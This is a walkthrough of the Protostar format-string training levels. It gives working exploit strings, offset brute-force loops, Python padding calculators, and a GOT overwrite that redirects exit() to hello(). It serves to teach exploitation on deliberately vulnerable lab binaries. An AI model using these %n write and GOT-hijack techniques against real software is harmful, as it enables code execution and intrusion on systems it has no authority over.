Exploit Exercises — Protostar Format Levels
This is a Protostar walkthrough describing format string exploitation.
This article is the only thing you need to complete these levels.
Format 0
$ ./format0 %64d`python -c 'print "\xef\xbe\xad\xde"'`
you have hit the target correctly :)
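When we use %64d, sprintf does not pop 64 bytes from the stack. It formats a single integer argument padded to a width of 64 characters, so 64 bytes are written into buffer. The four bytes of 0xdeadbeef that follow are copied past the end of the buffer, overflowing into the variable the level checks.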
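To check the width behaviour and build the same argument without shell quoting, a few lines of Python are enough. This is only a sketch: it assumes, as the command above implies, that 64 padding characters exactly fill the buffer.

```python
import struct

# "%64d" formats ONE integer, right-aligned in a field 64 characters wide.
# Python's % operator follows the same width rule as C's printf family.
expanded = "%64d" % 0
print(len(expanded))  # 64

# 0xdeadbeef as a 32-bit little-endian word, i.e. the bytes \xef\xbe\xad\xde.
magic = struct.pack("<I", 0xDEADBEEF)

# The argument passed to ./format0: the width specifier followed by the magic value.
payload = b"%64d" + magic
print(payload)
```

The point is that the four-character specifier expands to 64 bytes inside sprintf, so the string we pass stays short while the string written into the buffer does not.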
Format 1
Read this first to understand how different variables are stored. Then we look for target
:
$ objdump -t format1 | grep target
08049638 g O .bss 00000004 target
We see that the variable we need is in the uninitialized data segment, called .bss, and has the address 0x08049638.
Then I printed 146 words from the stack (each %x consumes 4 bytes) to find where our buffer is stored:
$ ./format1 ABCD`python -c 'print "%x."*146'`
ABCD804960c.bffff508.8048469.b7fd8304.b7fd7ff4.bffff508.8048435.bffff708.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff588.b7eadc76.2.bffff5b4.bffff5c0.b7fe1848.bffff570.ffffffff.b7ffeff4.804824d.1.bffff570.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff588.a003ccb4.8a519aa4.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff5b4.8048450.8048440.b7ff1040.bffff5ac.b7fff8f8.2.bffff6fe.bffff708.0.bffff8c3.bffff8d8.bffff8ef.bffff907.bffff915.bffff929.bffff94c.bffff963.bffff976.bffff980.bffffe70.bffffe89.bffffec7.bffffedb.bffffef9.bfffff10.bfffff21.bfffff3c.bfffff44.bfffff54.bfffff61.bfffff97.bfffffac.bfffffc0.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.78bfbbf.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff6db.1f.bffffff2.f.bffff6eb.0.0.0.0.0.50000000.f6e2fdf8.67e5aff4.14e8ba4e.6901a7c9.363836.0.0.0.2f2e0000.6d726f66.317461.44434241.252e7825.78252e78.2e78252e.252e7825.
Can you see the value 0x44434241 near the end? You can also use some brute force to find the offset:
$ for i in {1..1000}; do echo -n "$i ";./format1 "ABCD%$i\$x" | grep 44434241; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
141
142 ABCD44434241
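The same search can be sketched in Python. The function below is hypothetical: it takes a `probe` callable that returns the program's output for a given format string, so it can be tried here against a fake stack instead of the real binary. The names `find_offset`, `fake_probe` and `fake_stack` are my own illustration, not part of Protostar.

```python
def find_offset(probe, marker_hex="44434241", max_offset=1000):
    """Return the first N for which probe("ABCD%N$x") echoes the marker, else None."""
    for n in range(1, max_offset + 1):
        output = probe("ABCD%{}$x".format(n))
        if marker_hex in output:
            return n
    return None


# Stand-in for the real binary: a fake "stack" whose 142nd word holds "ABCD".
fake_stack = [0] * 141 + [0x44434241]


def fake_probe(fmt):
    """Emulate only the one pattern used above: 'ABCD%N$x'."""
    n = int(fmt[len("ABCD%"):fmt.index("$")])
    return "ABCD%x" % fake_stack[n - 1]


print(find_offset(fake_probe))  # 142
```

Against the real level, `probe` would have to run `./format1` with the string as its argument and return what it prints. That part is left out because it depends on the machine.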
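A specifier such as %4$x is what is called “direct access”: it prints the 4th argument without stepping through the first three.
You can see ABCD above, printed as 44434241 (don’t forget we are on a little-endian machine). Now we know the offset and we can try to access this value directly: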
$ ./format1 ABCD`python -c 'print "%142$x"'`
ABCD44434241u
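If the byte order looks backwards, this small sketch shows why the bytes "ABCD" come out as 44434241 when %x reads them as one 32-bit word on a little-endian machine.

```python
import struct

# The four bytes "ABCD" as they sit in memory, lowest address first.
raw = b"ABCD"

# Read as a little-endian 32-bit word: the first byte becomes the LOW byte.
little = struct.unpack("<I", raw)[0]
print("%x" % little)  # 44434241

# A big-endian read would keep the bytes in reading order instead.
big = struct.unpack(">I", raw)[0]
print("%x" % big)  # 41424344
```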
Now we know the offset of our string among the arguments printf reads from the stack, and we can overwrite the value using %n. Read more about using %n here. In a nutshell, %n prints nothing: it expects the address of an int variable and stores there the number of bytes written so far.
So if you use something like <addr>%142$n, printf will take addr from the stack as its 142nd argument and will write the number of bytes written so far to that address.
We know the address is 0x08049638, which in little-endian format is \x38\x96\x04\x08. Now we can simply replace ABCD with the address:
$ ./format1 `python -c 'print "\x38\x96\x04\x08"+"%142$n"'`
8�you have modified the target :)
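The argument used above can be rebuilt step by step. This is a minimal sketch: `build_payload` is a name I made up, and the index 142 is only valid for the stack layout seen in this run, since the position of the argument string can shift with the environment and the argument length.

```python
import struct

TARGET_ADDR = 0x08049638   # from objdump -t above
ARG_INDEX = 142            # offset found by the brute-force loop above


def build_payload(addr, index):
    """Address in little-endian order, then a positional %n that writes through it."""
    return struct.pack("<I", addr) + "%{}$n".format(index).encode("ascii")


payload = build_payload(TARGET_ADDR, ARG_INDEX)
print(payload)
```

Note that \x38 is the ASCII character 8, which is why the program output above starts with an 8 followed by unprintable bytes.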
Format 2
Now we are supposed to overwrite the variable with a specific value, 64.
Now let’s do a bit of bruteforcing to find the offset:
$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format2 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141target is 0 :(
Now we need to find the address of the target variable:
$ objdump -t format2 | grep target
080496e4 g O .bss 00000004 target
Let’s try to overwrite the variable with an arbitrary value first:
$ python -c "print '\xe4\x96\x04\x08'+'%4\$n'" | ./format2
��
target is 4 :(
We printed 4 bytes (the address) before %4$n, and target reports exactly that. If we want to write a larger value, we just need to increase the number of bytes printed. In this case the program prints 64 bytes (the 4-byte address plus 60 filler characters) before it reaches %4$n, which prints nothing itself and stores the number of bytes printed so far into target:
$ python -c "print '\xe4\x96\x04\x08'+'A'*60+'%4\$n'" | ./format2
��AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have modified the target :)
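The arithmetic behind the 60 filler characters can be written out as a short sketch. The variable names are mine; the address, the argument index and the wanted value come from the steps above.

```python
import struct

TARGET_ADDR = 0x080496e4   # from objdump -t above
ARG_INDEX = 4              # offset found by the brute-force loop above
WANTED = 64                # value the level expects in target

addr = struct.pack("<I", TARGET_ADDR)

# %n stores the number of bytes printed so far, and the address itself
# already accounts for 4 of them, so only the difference is needed as filler.
filler = b"A" * (WANTED - len(addr))

payload = addr + filler + "%{}$n".format(ARG_INDEX).encode("ascii")

printed_before_n = len(addr) + len(filler)
print(len(filler), printed_before_n)  # 60 64
```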
Format 3
We start this challenge with bruteforcing to find the offset:
$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format3 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
11
12 AAAAAA41414141target is 00000000 :(
Now we need to find the memory address of target
:
$ objdump -t format3 | grep target
080496f4 g O .bss 00000004 target
So let’s try to rewrite target
:
$ python -c "print '\xf4\x96\x04\x08'+'%12\$n'" | ./format3
��
target is 00000004 :(
Awesome! target now holds 4, the number of bytes printed before %12$n.
Then I tried to extend the string and look at the stack:
$ python -c "print 'AAAABBBBCCCCDDDDEEEEFFFFGGGG'+'%x.'*16" | ./format3
AAAABBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.41414141.42424242.43434343.44444444.45454545.
target is 00000000 :(
Now let’s write through the 12th argument directly and then look at the values on the stack:
$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDDEEEEFFFFGGGG'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.45454545.46464646.47474747.24323125.2e78256e.
target is 0000001c :(
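The value 0000001c is simply the number of bytes printed before %12$n was reached. A small sketch of the count:

```python
# Everything that precedes %12$n in the format string is printed verbatim:
# the 4-byte address and the 24 filler letters.
prefix = b"\xf4\x96\x04\x08" + b"BBBBCCCCDDDDEEEEFFFFGGGG"

count_at_n = len(prefix)
print("target is %08x" % count_at_n)  # target is 0000001c
```

The %x. specifiers come after %12$n, so whatever they print is not included in the stored count.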
To be clearer, let’s draw a simple scheme of our stack:
junk <- 1st, 2nd, ... values
...
\xf4\x96\x04\x08 <- 12th value
BBBB <- 13th value
CCCC <- 14th value
DDDD <- 15th value
EEEE
FFFF
GGGG
...
<saved ebp>
<saved ret>
I understand that it could be confusing, because the numbers here have nothing to do with how the stack grows. They are just argument numbers. If it is still unclear, try to read about direct access in this paper.
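The argument numbering can be checked against the dump printed by the previous command. This sketch splits that output into words and indexes it the way %N$x would. The helper name `arg` is my own.

```python
import struct

# The 20 words printed by '%x.'*20 in the command above.
dump = ("0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420."
        "bffff504.80496f4.42424242.43434343.44444444.45454545.46464646."
        "47474747.24323125.2e78256e.")

words = [int(w, 16) for w in dump.split(".") if w]


def arg(n):
    """Return the word that %N$x would print for N = n (numbering starts at 1)."""
    return words[n - 1]


print(hex(arg(12)))  # 0x80496f4  -> the address we placed first
print(hex(arg(13)))  # 0x42424242 -> "BBBB"
print(hex(arg(14)))  # 0x43434343 -> "CCCC"

# The last two words are the format string itself, read back from the buffer.
print(struct.pack("<I", arg(19)) + struct.pack("<I", arg(20)))  # b'%12$n%x.'
```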
Now everything is clear: we need to replace BBBB
, CCCC
, DDDD
with address + i
to rewrite each byte and add needed offsets in order to write the right value.
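Let’s try to overwrite the lowest byte first. It must be 0x44 (68 in decimal): 16 bytes are already printed by the addresses and fillers, so %52u adds the remaining 52: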
$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDD'+'%52u'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDD 0bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.75323525.24323125.2e78256e.252e7825.78252e78.2e78252e.
target is 00000044 :(
Then I tried to overwrite the second byte:
$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%13\$n'" | ./format3
����CCCCDDDD 0
target is 00004444 :(
Awesome, it works. I didn’t know %n keeps counting from the bytes already written, so the count can only grow. That makes it easier to write small values first. We need to get 0x01025544, but after reaching 0x55 we certainly cannot get a count of 0x01 or 0x02. However, only the low byte of each write matters for the byte we aim at, so we can write 0x101 instead, for example. We will write in this order: 0x44, 0x55, 0x101, 0x102 (or maybe 0x202).
0x55 is the second byte, so we need to increase the address by just 1 and print 0x55 - 0x44 = 17 more bytes:
$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'" | ./format3
����CCCCDDDD 0 3221222592
target is 00005544 :(
Instead of writing 0x101 and 0x102 separately, we can write 0x102 as a two-byte value at address + 2, which takes 0x102 - 0x55 = 173 more bytes:
$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08DDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'+'%173u'+'%14\$n'" | ./format3
������DDDD 0 3221222592 3086843892
you have modified the target :)
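The three widths (52, 17, 173) and the final value can be reproduced with a small sketch. The `paddings` helper and the replay of the writes into a bytearray are my own illustration of the steps above, not something the level provides.

```python
import struct


def paddings(already_printed, counts):
    """Extra characters needed before each %n so the running total hits each count in turn."""
    result = []
    total = already_printed
    for count in counts:
        if count <= total:
            raise ValueError("the printed-byte count can only grow")
        result.append(count - total)
        total = count
    return result


# Three 4-byte addresses plus "DDDD" are printed before the first %u.
already_printed = 3 * 4 + 4
counts = [0x44, 0x55, 0x102]
print(paddings(already_printed, counts))  # [52, 17, 173]

# Replay the three %n writes: each stores a 4-byte little-endian int
# at target+0, target+1 and target+2 respectively.
memory = bytearray(8)          # target plus the 4 bytes that follow it
for offset, count in enumerate(counts):
    memory[offset:offset + 4] = struct.pack("<I", count)

target = struct.unpack("<I", bytes(memory[:4]))[0]
print(hex(target))  # 0x1025544
```

Two caveats. A width only pads, so it must be at least as long as the number being printed (17 is enough for the 10-digit value seen above). Also, the later writes spill past target into the bytes that follow it, which happens to be harmless here.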
Wow, we modified the target :)
Format 4
Now we need to redirect the execution flow. My first thought was that we could just overwrite the return address.
As always we start with finding the offset:
$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format4 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141
Now let’s find the address of hello()
function:
$ objdump -t format4 | grep hello
080484b4 g F .text 0000001e hello
At this point I understood that we are not supposed to overwrite the return address; instead we need to change an entry in the relocation table (the R_386_JUMP_SLOT entries, which point into the GOT).
Let’s look at the relocations:
$ objdump -TR format4
format4: file format elf32-i386
DYNAMIC SYMBOL TABLE:
00000000 w D *UND* 00000000 __gmon_start__
00000000 DF *UND* 00000000 GLIBC_2.0 fgets
00000000 DF *UND* 00000000 GLIBC_2.0 __libc_start_main
00000000 DF *UND* 00000000 GLIBC_2.0 _exit
00000000 DF *UND* 00000000 GLIBC_2.0 printf
00000000 DF *UND* 00000000 GLIBC_2.0 puts
00000000 DF *UND* 00000000 GLIBC_2.0 exit
080485ec g DO .rodata 00000004 Base _IO_stdin_used
08049730 g DO .bss 00000004 GLIBC_2.0 stdin
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
080496fc R_386_GLOB_DAT __gmon_start__
08049730 R_386_COPY stdin
0804970c R_386_JUMP_SLOT __gmon_start__
08049710 R_386_JUMP_SLOT fgets
08049714 R_386_JUMP_SLOT __libc_start_main
08049718 R_386_JUMP_SLOT _exit
0804971c R_386_JUMP_SLOT printf
08049720 R_386_JUMP_SLOT puts
08049724 R_386_JUMP_SLOT exit
You can also look at the relocation table with:
$ readelf -r format4
Relocation section '.rel.dyn' at offset 0x304 contains 2 entries:
Offset Info Type Sym.Value Sym. Name
080496fc 00000106 R_386_GLOB_DAT 00000000 __gmon_start__
08049730 00000905 R_386_COPY 08049730 stdin
Relocation section '.rel.plt' at offset 0x314 contains 7 entries:
Offset Info Type Sym.Value Sym. Name
0804970c 00000107 R_386_JUMP_SLOT 00000000 __gmon_start__
08049710 00000207 R_386_JUMP_SLOT 00000000 fgets
08049714 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main
08049718 00000407 R_386_JUMP_SLOT 00000000 _exit
0804971c 00000507 R_386_JUMP_SLOT 00000000 printf
08049720 00000607 R_386_JUMP_SLOT 00000000 puts
08049724 00000707 R_386_JUMP_SLOT 00000000 exit
Good articles about shared libraries and relocations:
- The ELF format - how programs look from the inside
- The C++ compilation process
- Load-time relocation of shared libraries
- Position Independent Code (PIC) in shared libraries
I thought it would be a good idea to overwrite the entry for the exit() function with the address of the hello() function. Thus we need to replace the value at address 0x08049724 with 0x080484b4.
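Both numbers can be pulled out of the tool output mechanically. The sketch below parses the readelf and objdump lines shown above. The function name `jump_slot` and the idea of scripting this step are mine.

```python
# The .rel.plt lines printed by readelf -r above.
rel_plt = """\
0804970c 00000107 R_386_JUMP_SLOT 00000000 __gmon_start__
08049710 00000207 R_386_JUMP_SLOT 00000000 fgets
08049714 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main
08049718 00000407 R_386_JUMP_SLOT 00000000 _exit
0804971c 00000507 R_386_JUMP_SLOT 00000000 printf
08049720 00000607 R_386_JUMP_SLOT 00000000 puts
08049724 00000707 R_386_JUMP_SLOT 00000000 exit
"""

# The line printed by objdump -t ... | grep hello above.
symtab_line = "080484b4 g F .text 0000001e hello"


def jump_slot(listing, name):
    """Return the slot address for an exact symbol name, or None if it is absent."""
    for line in listing.splitlines():
        fields = line.split()
        if len(fields) == 5 and fields[2] == "R_386_JUMP_SLOT" and fields[4] == name:
            return int(fields[0], 16)
    return None


slot = jump_slot(rel_plt, "exit")
hello = int(symtab_line.split()[0], 16)
print(hex(slot), hex(hello))  # 0x8049724 0x80484b4
```

Matching the name exactly matters here, because a plain grep for exit would also hit _exit.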
Now let’s use a test exploit:
$ python -c "print '\x24\x97\x04\x08' + '%33968x' + '%4\$n'" > /tmp/exploit.txt
$ gdb format4
GNU gdb (GDB) 7.0.1-debian
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/format4 < /tmp/exploit.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x000084b4 in ?? ()
Awesome. %n stored 0x000084b4 in the slot, so the lower two bytes are right and we jumped to 0x000084b4. Let’s do the same with the other two bytes. Do not forget to correct the padding (-4 for the first one, because we added a second 4-byte address).
Now run the exploit:
$ python -c "print '\x24\x97\x04\x08\x26\x97\x04\x08' + '%33964x' + '%4\$n' + '%33616x' + '%5\$n'" | ./format4
...
code execution redirected! you win
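The two widths in the final exploit (33964 and 33616) follow from splitting the address of hello() into two 16-bit halves. This is a sketch of that calculation with constant names of my own choosing. It also replays the two writes to show what ends up in the slot.

```python
import struct

GOT_EXIT = 0x08049724   # jump slot of exit(), from the relocation table above
HELLO = 0x080484b4      # address of hello(), from objdump -t above

low = HELLO & 0xFFFF    # 0x84b4, written at GOT_EXIT
high = HELLO >> 16      # 0x0804, written at GOT_EXIT + 2

# The count can only grow, so borrow a carry when the high half is smaller:
# 0x10804 still has 0x0804 as its low 16 bits.
second_count = high if high > low else high + 0x10000

addresses = struct.pack("<II", GOT_EXIT, GOT_EXIT + 2)
pad1 = low - len(addresses)     # the 8 address bytes are already printed
pad2 = second_count - low

payload = addresses + "%{}x%4$n%{}x%5$n".format(pad1, pad2).encode("ascii")
print(pad1, pad2)  # 33964 33616

# Replay both 4-byte %n writes into a model of the slot and the one after it.
memory = bytearray(8)
memory[0:4] = struct.pack("<I", low)
memory[2:6] = struct.pack("<I", second_count)
print(hex(struct.unpack("<I", bytes(memory[:4]))[0]))  # 0x80484b4
```

The carry byte (0x01) lands in the two bytes after the slot, i.e. in whatever follows exit's entry in memory. In this run that did not prevent the redirect.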